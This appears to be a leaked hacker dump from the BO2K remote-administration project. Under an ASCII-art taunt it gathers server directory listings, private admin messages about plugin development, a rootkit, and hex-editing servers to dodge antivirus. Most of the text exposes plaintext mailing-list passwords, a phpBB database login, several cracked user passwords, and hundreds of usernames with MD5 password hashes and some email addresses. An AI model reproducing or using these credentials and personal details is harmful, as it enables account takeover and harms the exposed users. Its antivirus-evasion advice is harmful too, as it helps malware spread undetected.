-# |_.__/ \___/ \_/\_/ |_| |_|\___|\__,_|____|_|\_\
-# FOR TOO LONG the cDc has ridden
-# on the coat tails of this tool!
-# It is owned like the rest of
-# you
-# .__=\__ .__==__,
-# jf' ~~=\, _=/~' `\,
-# ._jZ' we `\q, /=~ THE `\__ Started this hack not expecting
-# j5(/ 0wned `\./ END... V\\, BO2K to be dead but in the end
-# .Z))' _____ BO2K | .____, \)/\ it was and is. So now its
-# j5(K=~~ ~~~~\=_, | _/=~~~~' `~~+K\\, time to finalize this shit
-# .Z)\/ `~=L | _=/~ t\ZL
-# j5(_/.__/===========\__ ~q |j/ .__============___/\J(N, You will not be missed.
-# 4L#XXXL_________________XGm, \P .mXL_________________JXXXW8L
-# ~~~~~~~~~~~~~~~~~~~~~~~~~YKWmmWmmW@~~~~~~~~~~~~~~~~~~~~~~~~~~ Fuck Y.ooM
-total 36K
-drwxrwsr-x 6 103 5487 4.0K Sep 5 2006 .
-drwxr-xr-x 660 root root 12K Apr 29 13:10 ..
-drwxrwsr-x 4 103 5487 4.0K Mar 29 16:26 cgi-bin
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-total 20K
-drwxrwsr-x 4 103 5487 4.0K Mar 29 16:26 .
-drwxrwsr-x 6 103 5487 4.0K Sep 5 2006 ..
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-drwxrwxr-x 2 127066 5487 4.0K Aug 15 2006 coranto
--rwx------ 1 126114 5487 1.2K Feb 24 2007
-total 200K
-drwxrwxr-x 3 126114 5487 4.0K Mar 20 13:50 .
-drwxrwsr-x 4 103 5487 4.0K Mar 29 16:26 ..
--rwxrwxrwx 1 126114 users 116K Mar 20 13:50
--rwxrwxr-x 1 126114 5487 23K Mar 20 13:50
--rwx------ 1 126114 5487 0 Oct 10 2004 axs.dat
--rwxrwxr-x 1 126114 5487 11K Aug 16 2005
-drwxrwxrwx 2 126114 5487 4.0K Aug 16 2005 data
--rwxrwxr-x 1 126114 5487 7.7K Aug 16 2005
--rwx------ 1 126114 5487 4.6K Aug 16 2005 license.html
--rwx------ 1 126114 5487 0 Oct 10 2004 log.txt
--rwxrwxr-x 1 126114 5487 107 Aug 16 2005 red.gif
--rwxrwxr-x 1 126114 5487 8.2K Aug 16 2005 tracker.jpg
-total 340K
-drwxrwxr-x 2 127066 5487 4.0K Aug 15 2006 .
-drwxrwsr-x 4 103 5487 4.0K Mar 29 16:26 ..
--rw-rw-r-- 1 126114 users 614 Jul 28 2001 archive.tmpl
--rw-rw-r-- 1 126114 users 583 Jul 28 2001 arclink.tmpl
--rw-rw-r-- 1 126114 users 8.4K Jun 28 2004 changelog.txt
--rwxrwxrwx 1 126114 users 9.5K Jun 28 2004 coranto.cgi
--rw-rw-r-- 1 126114 users 3.0K Nov 24 2002
--rw-rw-r-- 1 126114 users 8.6K May 5 2003
--rw-rw-r-- 1 126114 users 87K Jun 28 2004
--rw-rw-r-- 1 126114 users 1.1K Jan 14 2003
--rw-rw-r-- 1 126114 users 13K Sep 9 2003
--rw-rw-r-- 1 126114 users 78K Jun 28 2004
--rw-rw-r-- 1 126114 users 6.5K Jul 28 2001
--rw-rw-r-- 1 126114 users 4.3K Jul 28 2001
--rw-rw-r-- 1 126114 users 32K Jun 28 2004
--rw-rw-r-- 1 126114 users 16K May 5 2003
--rw-rw-r-- 1 126114 users 2.6K Aug 15 2006
--rw-rw-r-- 1 127066 users 178 Jul 28 2001 .htaccess
--rw-rw-r-- 1 126114 users 7.1K Jun 28 2004 viewnews.cgi
--rw-rw-r-- 1 126114 users 508 Nov 25 2002 viewnews-readme.txt
--rw-rw-r-- 1 126114 users 90 Jul 28 2001 viewnews.tmpl
-total 1000K
-drwxrwsr-x 24 nobody 5487 4.0K May 5 13:29 .
-drwxrwsr-x 6 103 5487 4.0K Sep 5 2006 ..
-drwxr-sr-x 2 252872 5487 4.0K Sep 4 2007 bo2k
-drwxrwsr-x 6 142021 5487 4.0K Oct 15 2006 buda
-drwxrwxr-x 5 58519 5487 4.0K Jan 17 2007 community
--rw-rw-r-- 1 58519 5487 26K May 17 2002 converter.html
-drwxrwxrwx 3 58519 5487 4.0K Sep 2 2006 coranto
-drwxrwxr-x 5 58519 5487 4.0K Mar 23 2007 dev
-drwxrwsr-x 2 126114 5487 4.0K Jul 13 2007 Development
-drwxr-sr-x 2 126114 5487 4.0K Mar 21 2007 DiggerX
-drwxrwxr-x 5 58519 5487 4.0K Jan 25 2007 docs
--rw-r--r-- 1 126114 5487 11K Feb 7 2007 documentation.html
--rw-rw-r-- 1 126114 5487 11K Jan 23 2005 documentationold.html.old
--rw-rw-r-- 1 58519 5487 7.6K Jul 2 2003 featurelist.html
--rw-rw-r-- 1 126114 5487 5.7K Mar 23 2007 feedback.html
-drwxr-sr-x 2 252872 5487 4.0K Apr 18 2007 files
-drwxr-sr-x 2 126114 5487 4.0K Mar 23 2007 Fluffy
-drwxrwxr-x 2 126114 5487 4.0K Mar 27 2006 forum
-drwxrwxr-x 10 126114 5487 4.0K Mar 22 13:35 forums
-drwxrwxr-x 3 58519 5487 4.0K Jul 26 2006 img
--rw-rw-r-- 1 126114 5487 5.2K Aug 16 2005 index2.shtml
--rw-rw-r-- 1 58519 5487 4.9K Jul 8 2003 index2.shtml.bak
--rw-rw-r-- 1 58519 5487 3.4K Apr 3 2003 index3.shtml
--rw-rw-r-- 1 126114 5487 3.4K Apr 3 2003 indexold.shtml
--rw-r--r-- 1 126114 5487 2.7K Dec 17 2006 index.shtml
-drwxrwxr-x 2 nobody 5487 4.0K Nov 17 2002 lovebeads
--rw-rw-r-- 1 126114 5487 1.1K Dec 17 2006 newfilereleases.old
--rw-r--r-- 1 126114 5487 1.5K Mar 21 2007 newfilereleases.txt
--rw-rw-r-- 1 58519 5487 3.3K Jul 2 2003 news.shtml
--rwx------ 1 126114 5487 61 Jul 12 2007
--rwx------ 1 126114 5487 52 Aug 5 2007
--rwx------ 1 126114 5487 47 Mar 24 10:51
--rwx------ 1 126114 5487 46 Mar 24 10:54
-drwxrwxr-x 10 58519 5487 4.0K Dec 11 2006 novice
-drwx------ 9 126114 5487 4.0K Apr 8 09:44 novice222
-drwx------ 2 126114 5487 4.0K Mar 24 10:57 novice222b
-drwx------ 11 126114 5487 4.0K Aug 8 2007 novice222c
-drwx------ 10 126114 5487 4.0K Apr 3 19:59 novice222d
-drwx------ 2 126114 5487 4.0K Sep 15 2006 NoviceP
--rw-rw-r-- 1 nobody 5487 253K Jun 3 2002
--rw-rw-r-- 1 126114 5487 27 Mar 31 12:17 robots.txt
--rw-rw-r-- 1 126114 5487 13K Aug 16 2005 rootkit_bookcover.jpg
--rw-rw-r-- 1 nobody 5487 22K Jan 22 1997 slant.ttf
-drwxrwxr-x 5 58519 5487 4.0K Mar 21 2007 software
--rw-rw-r-- 1 127066 5487 439K Dec 15 2003
--rw-rw-r-- 1 nobody 5487 24K Jul 10 2002 srv_scanpw.dll
-drwx------ 2 126114 5487 4.0K Sep 17 2006 tars
--rw-rw-r-- 1 58519 5487 4.2K Jul 2 2003 whatis.html
-total 2.6M
-drwxrwsr-x 6 142021 5487 4.0K Oct 15 2006 .
-drwxrwsr-x 24 nobody 5487 4.0K May 5 13:29 ..
--rw-rw-r-- 1 142021 5487 2.1K Jun 9 2004 1641.jpg
--rw-rw-r-- 1 142021 5487 101K Oct 4 2004 1.jpg
--rw-rw-r-- 1 142021 5487 31K Oct 4 2004 2.jpg
--rw-rw-r-- 1 142021 5487 21K Oct 4 2004 3.jpg
--rw-rw-r-- 1 142021 5487 32K Oct 4 2004 4.jpg
--rw-rw-r-- 1 142021 5487 83K Nov 11 2004 allgui.jpg
--rw-rw-r-- 1 142021 5487 2.6K Jun 9 2004 avatar.gif
--rw-rw-r-- 1 142021 5487 2.9K Oct 28 2004 avatar.jpg
--rw-rw-r-- 1 142021 5487 14K Jun 14 2004 Buda.jpg
--rw-rw-r-- 1 142021 5487 44K Oct 6 2004 crazy.jpg
--rw-rw-r-- 1 142021 5487 122K Oct 6 2004 gmail.jpg
--rw-rw-r-- 1 142021 5487 39 Oct 17 2004 index.html
--rw-rw-r-- 1 142021 5487 3.6K Aug 26 2003 links.html
--rw-rw-r-- 1 142021 5487 139K Sep 29 2004 loladas.jpg
--rw-rw-r-- 1 142021 5487 225K Jun 29 2004 lol.jpg
--rw-rw-r-- 1 142021 5487 257K Dec 23 2004 misc_bopeep.dll
--rw-rw-r-- 1 142021 5487 122K Jan 13 2005 misc_bopee.rar
-drwxrwsr-x 2 142021 5487 4.0K Oct 22 2004 newgui
--rw-rw-r-- 1 142021 5487 38K Oct 4 2004 new.jpg
--rw-rw-r-- 1 142021 5487 44K Oct 14 2004 newok.jpg
-drwxrwsr-x 2 142021 5487 12K Jan 21 2005 peepdoc
--rw-rw-r-- 1 142021 5487 66K Dec 13 2004 peep jpeg.JPG
--rw-rw-r-- 1 142021 5487 30K Dec 13 2004 peep stdn.JPG
-drwxrwsr-x 2 142021 5487 4.0K Mar 31 2004 pics
--rw-rw-r-- 1 142021 5487 3.4K May 6 2004 plugins.html
--rw-rw-r-- 1 142021 5487 8.7K Dec 22 2004 POR2.gif
--rw-rw-r-- 1 142021 5487 32K May 26 2004 screen.jpg
--rw-rw-r-- 1 142021 5487 940K Jun 11 2004 setup.exe
--rw-rw-r-- 1 142021 5487 140K Aug 26 2004 telnet.jpg
-drwxrwsr-x 4 142021 5487 4.0K Jan 26 2004 tut
-From Fluffy - Novice222:
-Well i still cant compile it with any visual studio but i will try on with 6.0 and the errors there
-are a few linking errors:
-LIBCMTD.lib(dbgheap.obj) : error LNK2005: _malloc already defined in fake_libc.obj
-LIBCMTD.lib(dbgheap.obj) : error LNK2005: _free already defined in fake_libc.obj
-LIBCMTD.lib(dbgheap.obj) : warning LNK4006: _malloc already defined in fake_libc.obj; second
-definition ignored
-LIBCMTD.lib(dbgheap.obj) : warning LNK4006: _free already defined in fake_libc.obj; second
-definition ignored
-Creating library Debug/srv_fun.lib and object Debug/srv_fun.exp
-LIBCMTD.lib(crt0.obj) : error LNK2001: unresolved external symbol _main
-Debug/srv_fun.dll : fatal error LNK1120: 1 unresolved externals
-i dont know what to do. Confused
-Also one thing that has been on my mind, authentification.... when making a server with it in the
-gui it says "Single User" does that mean it was made in the
-thought of making one later that could support multi users?
-Check Your email Fluffy - Novice222 :
-Wow thanks, i guess that was directed to my messiness Laughing (it was realy nice that you took the
-time and i had a look and i think its ok if you post it
-though i cant compile it myself Crying or Very sad ) however i cant compile it Confused BTW what
-version are you using to compile your projects, ive tried
-2005 and 6.0 and neither works with it..... i just dont understand whats visual studios problem
-Question anyways i dont realy know how to setup 6.0 ive just
-new since installed it, so i think i might eventually make it work. Rolling Eyes
-New Admin Fluffy - Novice222:
-Wow.... sounds sweet.... though im not good enough to do the programming work..... but if i will
-try my best Very Happy
-New Admin Fluffy - Novice222:
-Ok, i will find info on those and download something Razz . Also I dont know anything about unix
-but im a really good PHP programmer.
-New Admin Fluffy - Novice222:
-Oh thanks.... but are you still going to be here as much or are gonna take some time off? Razz I
-have Smart FTP 2 which should be able to do all ftp tasks. I
-know i dont know a lot about these developer programs but i will learn it pretty quickly.
-New Admin - Digger - Fluffy:
-Ok, I updated your Title and permissions to Project Administrator.I will try to recruit a person or
-two that are good with C+ cause I my self don't know it
-yet. I want to help keep us moving foward and help update and expand Bo2k's plugin selection.
-New Admin - Fluffy - Digger:
-Wow.... i did except that sooner or later but not so out of sudden.... i guess we will have to
-learn C++ then.
-New Admin Fluffy - Digger:
-C++, a good tutorial and some aspirins.
-New Admin Fluffy - Novice:
-I need some help getting started with making C++ work (Visual C++ 6.0) ive tried to compile botool
-just as a test and got some errors and i dont know what to
-do. Well really just two different errors but i dont know how to fix them.
-cli_botool\clzhcompress.cpp(465) : error C2065: 'FileName' : undeclared identifier
-I get a lot of these undeclared identifier errors in clzhcompress.h and only there.... ?? And i
-also get errors about cli_botool\src\explorefunc.cpp(31) :
-fatal error C1083: Cannot open include file: 'botool.h': No such file or directory botool.h and
-resource.h not being there though they are in the project as
-they are supposed to be..... ?? I would be really grateful if you could help me with that.
-Shell Fluffy - Novice:
-How can i access the saved files of bo2k? (dont know that stuff Razz ) With shell server right? But
-i can only connect to my folder which is empty....
-Devteam Fluffy - Novice:
-I am updating the site since its kinda outdated. (just links and stuff) in
- what should be displayed as your name?
-Coranto Fluffy - Novice:
-How do i use coranto? Or do i have to do the news manually?
-CVS Fluffy - Novice:
-I have a problem with CVS.... and i dont know what to do..... no matter what i try i cant
-connect..... i get:
-....\Temp\TortoiseCVS make new module temp\: cvs.exe -q import
--m bo2k_plugins tcvs-vendor tcvs-release
-cvs [import aborted]: end of file from server (consult above messages if any)
-Error, CVS operation failed
-do you know anything about that?
-New Source Fluffy - Novice:
-Ok.... for the first time everything is working however i downloaded all the bo2k files via CVS but
-the stuff is old.... where are the new sources?? (sorry
-for spamming like that but im just not very used to this yet)
-New Source Fluffy - Novice:
-What about bopeep? The only source download for it i found was version 0.9 and in the SSH i found
-version 1.1 (i found that out after compiling it). I would
-really like the new source and see if i can fix the copy button..... because till now visual studio
-hasnt worked but now it does so i can compile the plugins
-which means that i can make it. Only one question for that..... which way did you intend to make
-the copy button work? (i heard you can convert the screen to
-an HBITMAP and then copy it to clipboard).
-PS: phpBB works again all out of sudden.....
-Coranto Fluffy - Novice:
-I have a problem with the coranto folder.... when i try to change the ch back to 770 SSH tells me
-"Error writing file atributes".....
-Coronto Fluffy - Digger:
-(sorry if it took some time to respond.... my phpBB account was screwed....) Ok account name
-DiGgErX and pass "diggerx" non capital (you should change that)
-Well after posting a news in coranto you will have to use SSH Secure Shell to move the new news
-files into the coranto folder.... you will only need a single
-command. download it and connect to
-sourceforge ( port 22). In file
-transfer client you can see all the bo2k website data (/home/groups/b/bo/bo2k/htdocs/) but you wont
-need that to move the news files into the coranto
-folder.... instead open the Shell Client and put in the command: cp
-/tmp/persistent/bo2kdata/NewsFiles/* /home/groups/b/bo/bo2k/htdocs/coranto so you wont
-always have to browse down to those folders. You will also need a CVS tool for the bo2k sources
- and an ftp client
- . The ones above are just those
-which i recommend... you can use any tool you want.
-Info Passwd Novice - Digger:
-Digger you can forward this to Fluffy.....
-Sorry for the delay guys but I was away and didn't have
-access to the necessary material.
-Here are all the passwords to the mailing lists.....they
-aren't used much anymore...they have been deemed almost
-obsolete by the phpBB
-New Programmer Digger - Fluffy:
-Tell me what you think. This was the email.
-I am interested in providing help for your project. I have
-worked in C/C++ last 5 yrs. And I remember using BO2K long
-time back and found it interesting. Let me know if I can be
-of any help to you....
-New Programmer Fluffy - DiggerX:
-Sounds great.... i already would have a little job for him.... but first novice has to tell me
-where the new bopeep sources are
-New Programmer Digger - Fluffy:
-Ok, looks good so far. This person can start with in a week. What do you think we should have him
-look at/work on first, to see what he can do? Should we
-have hime make a new plugin or just add to or fix a small bug in one? If so, which bugged plugin?
-Or, should we really put him to the test and see if he can
-brind the RootKit up to date with Vista? Let me know what you think.
-ps. Been reading C and C++ for Dummies. So far only able to add some line of code to those small
-test programs. Still have a very long way to go in
-understanding the complete lang.
-Making Server undetectable Digger - Fluffy :
-I don't wan't to post this info cause AV people could be around, you never know. I simply Hex edit
-my servers. I found encrypter just screw things up. Hexing
-I can still edit my servers with config tool and server work 100%. Still tring to understand C++
-have some tuts but learning this on my own is hard. Talk
-Digger being hardass to no0b:
-(You must be a active and provide on going participation in our forum)Sorry but, I see you only
-have 2 or so post. This small app has nothing to do wth our
-project however I like to give back to our members that have proven to show a true interest in our
-project by helping other members with questions and such.
-Our project is Free to use and of course open source so other may change or improve it they will. I
-some times come across other apps or ideals that I make
-available to our members. Such software as my netstat killer is availible to the select few. I have
-updated this app and will soon post a link. I will be
-more than happy to give you the pw once I see you being active with legit post. Heres pw to the
-first release you have. Enjoy!alphadeltatango1013xz2007
-Bo2k-dev list - imagelist
-Bo2k-general - listbutt
-Bo2k-cvs_updates - listc1v2s3
-bo2k-users - dragenter
-$dbhost = '';
-$dbname = 'b4487_phpBB';
-$dbuser = 'b4487rw';
-$dbpasswd = 'thepiggy';
-AndreR 43d5c7dc251e50787cf5c92d1e813277 -
-catkinson 3d5524b7a2c1dcd6f936cfe822b36fa1 - testlab
-michaeless 4310bc7480e027b4b5aede530e4ee9df - 8letters
-DiGgErX fbd6f8fdb2ad1e8837e763ce54502938 - 246868
-Fluffy cb0de5de71eec74a2c4ec6ebc9decfb4 - warumich
-AndreR 43d5c7dc251e50787cf5c92d1e813277
-Andy289 e502486ae444b876917c0267371f7f9f
-martinmueller d3103f022b66619fcc3002cef386d3bb
-Borealis404 3dae8d135fdd2fea15466039ad7b880c
-whipaz f9e960903f96b3606fec2ed914d40798
-novice222 a82c6fc93e8638a821eae80416b20a33
-davidleebjr dfd6a6509b923084605a31e2b9028a06
-cruxcriticorum e2fd2b03ec512467f30aee772ef5a9d2
-rkuk d0199f51d2728db6011945145a1b607a
-azure_br 34e64393f47d54c3f94a29f70fd2479a
-O.Z.I b04d69c159c0c530ff1185dd9c5e67a5
-caustic d750e64f8deb5b64bd85f804a415c5ef
-Memo c39bcb8926ae17556e616e86fc03b110
-ethancottier 26a49849343376cd87f42062e7319b18
-u8rwv 83449d980192216a47c7558e6444de12
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-carpman54321 ce3564a0b5be01cd3d38f4d183366981
-aiscs2003 e2a7106f1cc8bb1e1318df70aa0a3540
-Caleb 4cefb24d824696988c7b1d38b35b69e8
-Itachi Uchiha e2798af12a7a0f4f70b4d69efbc25f4d
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-TRINITY 1e638553c85cfe4d32b8cde0e782d600 BRIAN@BWPARKER.CO.UK
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-Th3ChaS3r a4fd8e6fa9fbf9a6f2c99e7b70aa9ef2
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-joba356 fe0706c95722e84b7ea07555be0ab8f8
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-Csmith197 a8ff26d4802b18033a97eb4aa4b757aa
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-Dyzan a417816ec35f5e1f31688bd9c52754a3
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-kiyoshi69 673dc13e1fad11b1b5a020ec6a4ba941
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-MEme d948aed52a69a6e26b9f466544f3600f
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-Xer0 d189d29566db8b6502f95bb1137bb904
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-sTupID 4933a8a7148e7006ea1609f2bfe19849
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-KillThePoets 3c8a79f81a4c1640353f1c2459a6f77f
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-jone 33bcea61ff7edac1e6c777b5d6607076 thecount202@HOTMAIL.COM 94363ddf617853d4845fb55f465d62e4
-Jamez 96513f904efafc853494fa1e493891a8
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-.:LzL:. 140e27ed024ac8d797e7bc6fe211377c
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-R 9cb9d35d7b754c22b46513f79852ca2a
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-Base 1f92a576aaedade5f10b6d6133ec0638
-JackoD. 8c19bdeadbfd1ae5a8e7dfaace6eb3e4
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-Explorer2000 ae2b1fca515949e5d54fb22b8ed95575
-PuppetMaster 3f4e2d07ac1e192ff6190e93528510fb
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-goodtimefun4all 03cce09cae7331b8dc315ae4c89f4372
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-nirvana0909a 93279e3308bdbbeed946fc965017f67a
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-Hedegaard-o1 da1f06233fed32a00332fb1703739623
-joseitopepe2 d36fc9a6cdf74c4629f89d41ce5f0e25
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-2will748 d06c66bcb84b28a0639d11e532967f61
-RobCockula cad24b54e09ca1cc52b9b8ed6c62ee50
-TonFTP 52b54adc660e48d7a62e5f902a4f52e8
-gb_master fc5740e67573f3e0abad9288b2c3ae3e
-Todesengel_7 07ac20cabaf58239369e205db6d10937
-JenBabe bbb8aae57c104cda40c93843ad5e6db8
-jhaala 0c5f10813c5f6befe0da412e67a6aa60
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-idhqidhq 98d0fd319c9a8896a10d902fe9f07944
-toddsyean a7d1468cea362edbeff943b22c8baea9
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-arlgil 92a189c4c0a2bd379b8c77fb4c869c01
-daveyr2005 97bf34d31a8710e6b1649fd33357f783
-Esper 6219bfd2585a9dadb469cb94ad6886a8
-tapabong 7f13da054bc4129ed0f9545903ea0346
-eugenio_reis d2ebd77b92cfcbd673521778a27568c5
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-bosco123 5ebb368494f618c3d6634efa03eccf94
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-datguywhowanders 565a959a4589e263fbc1d8fd06ccee60
-Castle e5fb9291472a271a8019b5eb99bc4ac4
-xtboss b878bc127cdb631d4fea3580fccceaa0
-diavoli f258c44abd31259af6f8be8c43e2209d
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-B.BOy 1581eac8d8b98d1404d0d67845b0fc86
-BlueIce b5398a36d520ed87acd0df6290e25c90
-AcoLyte bfdb1c75e1b0d10406c2847fcf74fa9d
-shintoroi c747739918027dc457ead76bbf2e2048
-g00gle ddb756cb5b9d3c74d72f486d4e6adf7e
-lycan_sejemaset 265d8cea167a44fb0f7d409f11e8619e
-BAHRAM 9efac5beecff6fcdc067ae82b13ad15c
-neat3 c33367701511b4f6020ec61ded352059
-frozen ff836d02cdc1195fe9208abb02ab46fa
-Silens.Intro ea0f3922b5c230d90183e0049811ac09
-strumar 92e3edaf07cdee7cda6eaf4b4094ec35
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-kitch 22d7fe8c185003c98f97e5d6ced420c7
-blu3 a47ab8f2c6927dcb628b645d97640ccd
-vangog c03350d5a1be90aeba31a444b0776e5c
-ceh 875ce7077e435d063b7f86b67897fd1f
-Smoked em 99d9de1a2a5f3d275e0492a42536ae04
-syrus 473b1a3d49ee043264dfc0ce89c93aca
-FRoZen^IcECuBe 11e80a5f8f8a664c27ed8ea181c6df52
-grizox657 acc6f2779b808637d04c71e3d8360eeb
-ddahlinster b52b7e12d898e70cdc13d6335c2fa777
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-dark1111 11ddbaf3386aea1f2974eee984542152
-endyss 266e9ba29954ddf397af924ac676792d
-wilfian 5bbc4042de0c404534fe15df52a516cb
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-oxgon e10adc3949ba59abbe56e057f20f883e
-axa b04d69c159c0c530ff1185dd9c5e67a5
-jonny_holden 8f3d90da1ad6411d196cd2c2db930eaa
-blackcat b548041eace32fbc988c6540cdb8cb95
-r2al3ac 354523d6301186d4ccafc8523eb5f9fe
-Joe245 7279964a65687f3a85fc7481bbe18f58
-kryptophonik cea3cac2576136efbdd30e6524b012a3
-antonym55 c33367701511b4f6020ec61ded352059
-imeanblue 9fdcd94521f7ef2350e539289c6bfa78
-.calibre decca33788173f1385c977d9bcf12e09
-omzz aac8d3b36e06b6d9fbaf144010b16e95
-godamsmack 5f4dcc3b5aa765d61d8327deb882cf99
-Obmar 59931dbc55de73dc815ac4a0170e5443
-Dakknight 2d800611a623d9c4b4cbb316488195b0
-DeaDeYe92 406bec88df0259a6ee9298eece856932
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-JILL f8ed98bfad3261d454aaa8cf83a617d9 OPTIC@MTS.NET
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-HHGKLGGG4562 688aafb07e41b6b6e5f4ecb445c22d19 TSSHUNDE@GMAIL.COM
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-terminal.bliss 20b985ba91f9e8d150b8fcfd4372c07d
-jony1977 ca1871726e4d487b064d0a0fb2842223
-havokish 1a68a5672b770bd4693e59d7176f89b2 0
-Koriar daf63b42c52e76ac9f1a1c7eb26b1ae3
-phantom784 e79aca87d0a49fe2b90486c3b9ee7d8a
-karthike 909547a318ebdad0e27e1d4b0420cd1a
-WK d25ae3a84533b6c29bd5091a3f85e5ab
-CyberMan00 73bb6569ce2370e1992cf378e6138b13
-Billybob 6f5ce509409309955069e71990502319
-nebajoth 33cd2e4c32f19edb3a75bdbb1c3ec72e
-phyxa 14854f02615b6b1f5571b2fd28800223
-jamiecollinson 1c138fd52ddd771388a5b4c410a9603a
-withawhat 2bacbb0d0f5b89c2a107f9882ccabd05
-bit2 0edfd5bd129fcfa8dc6c9607d04780b7
-zanetusken b9dba0afdc84c574345d304a161c7830
-bhattabdul 7634dbcaad8c1e35cde5b33ed7201e89
-Yggdrasill a272ec479b693108f946c0c4320ccf4a
-TinyTim 7f0957b2c3a24e271a4fe708152657ed
-gooooooogly 1ad9a08f3507302aa8964e5245683ca3
-THER 9cb9d35d7b754c22b46513f79852ca2a
-vipzen ffe553694f5096471590343432359e02
-IronJan 23c9d0b4079bfd35b26dc539aa129cb0
-controversial1 12cd8215b8b7d0cea5d4d22180862cfc
-TechnoMan d804898571893c3939a9736b16efda3e
-miraj 87407e3d60d386ec1d1d35ccd8e8edce
-waldo77 e67c10a4c8fbfc0c400e047bb9a056a1
-smir86 5583413443164b56500def9a533c7c70
-bloodwraith 76c86ae61eb5f7bd79c14f79ab015112
-alnovepo 76c7006c810c713a933b64ce2a4a9af1
-michaeless 4310bc7480e027b4b5aede530e4ee9df
-lilbo19 622dbd625cd6d83405e041d935507964
-Michael Yardley 1cd87f5976c0893cb50d0758f528963f
-km559739 a4738967a068115323a8f54db6592cff
-jkbo2k 7a04dfdb459cc8b8ace207bfaa6ce50d
-qoisone 691f4ee0a8ee19ac4107d7ffac727402
-metalliman e32a3e8895594576cff8307198738027
-pencilbox d488f9441babe51c8ffbe2b456e22d68
-TomRipley 4afd5a0812c0504c3c89c3c560b5538f
-Tesla 3c962bf49ebcc09d09927933ba8bf3f7
-Law&amp;Chaos 2a26774f0351eb105625377421412e4b
-mconner27 1e46fddc42b2075312d8918a51e00192
-steph 67066022e92b394f09093ffc5c80fa9f
-eeasee 670da91be64127c92faac35c8300e814
-rain357 e10adc3949ba59abbe56e057f20f883e
-crazy_ray87 3413126057bbe3d4f6ec0718fc033da9
-SavageAir d212399f93f098d315184dbc0c3a5184
-justcurious 0945fc9611f55fd0e183fb8b044f1afe
-aws a5df375d7c972248177e8b4407c8808c
-yoko 131996a948c1bc1044791eb7487acdbb
-mvanes01 400eec92094fcddfeac1761c785deb37
-cwhitti b3f952d5d9adea6f63bee9d4c6fceeaa
-conner27 1e46fddc42b2075312d8918a51e00192
-smallz12 f2fea873c2923c711407293737c68a6f
-uzmanager be4697cd969004ac362801e97e9a56cb
-billygoat71 d63e0eaa4c7603133083eac9b558c33d
-Fallen 38b5c9709668103bdf3e207a76d0b9cd
-boredkiwiguy 8d70e0d1acb06b4648c7aa8927509660
-anarcotik 5c8454580d3b2e221eb50115c70711ce
-Rorwooken 7dcd56dd7d26058acfbdfd0258b654a9
-geba 38454f6f808076a4d7cd8cb2c0f49cba
-jki 045682c67b4b69ffa5e3bdc6f77bf999
-xxstaggyxx b5f0683e77a2982a42b3ed1d639b7e89
-KLEY 962012d09b8170d912f0669f6d7d9d07
-drefts 70b76e485a07f4476e690a5093685b06
-MikeKnight d5bd80ffdaf33336cf2756f58403976e
-luckynyk 9686f22ad7125e39b9acf0a14150c9bb
-anthonimatic 87e897e3b54a405da144968b2ca19b45
-Delamater 76419c58730d9f35de7ac538c2fd6737
-wkid cbbcb1ffb2d8dce184a04b0ac13cd366
-kusss a03e2e1002692b467e1220281d915f0e
-amacfie ae9df8722138865ffc98ee26a3868d01
-COA4715 808c678dcb3006d705f8b564b1ef462d
-jawbreakerd4 8eea6534baee3e9227ad4914348c24d5
-stealth350 edf2c70035f55af16951e43a79c4f3be
-swaprom 1bb1d0bb815d9167e283cfb362f87257
-dawn 2c9950884875a5a8364d0ca422e8f041
-Twang e99b990aaa3ee94d2f222df8c14dc709
-Markus24NRW 2c1743a391305fbf367df8e4f069f9f9
-hellrisen af97a13817b647646b325d629d32c8aa
-philskillz 316e16bf64c9633b67265740cda5c659
-driekes 86a3569a56d8990b41e53c88c37b4689
-lord_mendel 03e0a20d32472d426558c27a28339e44
-deader5000 df39ff03bc2ccf01ac2a03e8e045e558
-potmstun ecb97ffafc1798cd2f67fcbc37226761
-j368 9c28b1d790af0a58491162e7383cd817
-shreaker c15ed73466b849796e103ae8fbd8e458
-nghtcrft fe9e1b90ba44d01aa88ba5a0b4aa911c
-Dogfish 818bf5365e1de87fea175bda652162b3
-tjarde 70f4a46b01032d6097e003b01a9418e9
-Pernat1y 24ecb6c5567340e4b7bc0e54786d1841
-loup b317be3462a839f7801a8833b7c2091a
-shahata5 f1a81d782dea6a19bdca383bffe68452
-bhill768 aa42f3e2f3f3119e2706f6a10f544aef
-darkkosmos 144274f4516821d3ed521bd814ad872e
-anthonyyyg 6b154c646b830ac8a103e723c77e1c46
-NeoHakai 89f10a9e1dec531ee8acb5bbb69bc4e7
-fritzthebeast 7cc277cfc93b814a898ffaa31d4710ab
-kalidomra 23c53d91b6cc1b4aa0494802a0b68781
-jakeishere 4297f44b13955235245b2497399d7a93
-Saudi c8291b75e9731c55bb8c6628bf7cad9f
-Jfave e77dfef156e22e4b4ad6daa3958b3f50
-thesaxman 64bd4c4cb7528fcae0f11cae03ba590b
-drate 29f26d37ae1c5a5f618c2e904d174456
-chgoarea 3d4d5970d817b41ea474298f62854e42
-nomojob e2ef007c4f768aeda217311fd39ba4e5
-spexc31 038fd73a9f8eb07a57fc87e94457a7f4
-ali 502c7374bebefaec076e8a09117439b2
-bekin dafcad6bec14c092ee03e4e69baf631d
-tron103 119e56693d2816c92f74e061d36739f9
-richardPM 0088d3c1d7f9192767eaf7d95b2ec5f0
-RedOctober 770276145378c48f76b97829e663eed3
-sideshowmel 4ae428e104c63d2e0e78b157230a9a3f
-triglad 195f9b9fd8128a29dac773077994698f
-norin radical 839ec25f709ade9191e5531944745407
-Googlecdg 1aea966eecfe54dae79e7d8092945f0e
-hkuspace 25d55ad283aa400af464c76d713c07ad
-yama d7324e16e63c939cbcfe0da54ad580e5
-Phiphler c5b27c06b12609778d8812389ab4439b
-bikam0wz 454b650d4e78b35310719fdb05bb077a
-SuperStarJon ddde18d21f121ae41e8f49b37c18a463
-sommer fa5952daebca77d9d552a07f09a79f23
-xfreakk faf2ca38c02c5f2ba1c49d200a03f9fb
-grjemo 9376a81ed6eff08f555c88bdd9ce408a
-botnut a52a353c11ec761a5f70c853d26ba38c
-Raggdoll811 9fc1386e8b680dd5052344caf9aff984
-raleighburner 2cc5143f13c0f9a00a146d37b7e51aff
-aplace2rest ebedb0d14385c3fb0d6ef076db69bb82
-pleb0cide 1d48d838f865f48ec8116ddaa3b2d4c5
-ARRRRR! 8bf425337221aaad40f496b26baa792a
-hobbit bd9580aa804a8af86c0d55bb59a867c2
-assassin a9448baf7ff29d45f8daeefb1cb953aa
-ustim b2ace2a3addadb4211256365427d69a9
-ralos 7b4f0098f52c78647be2bc5dd6e10d08
-100kg 25f9e794323b453885f5181f1b624d0b
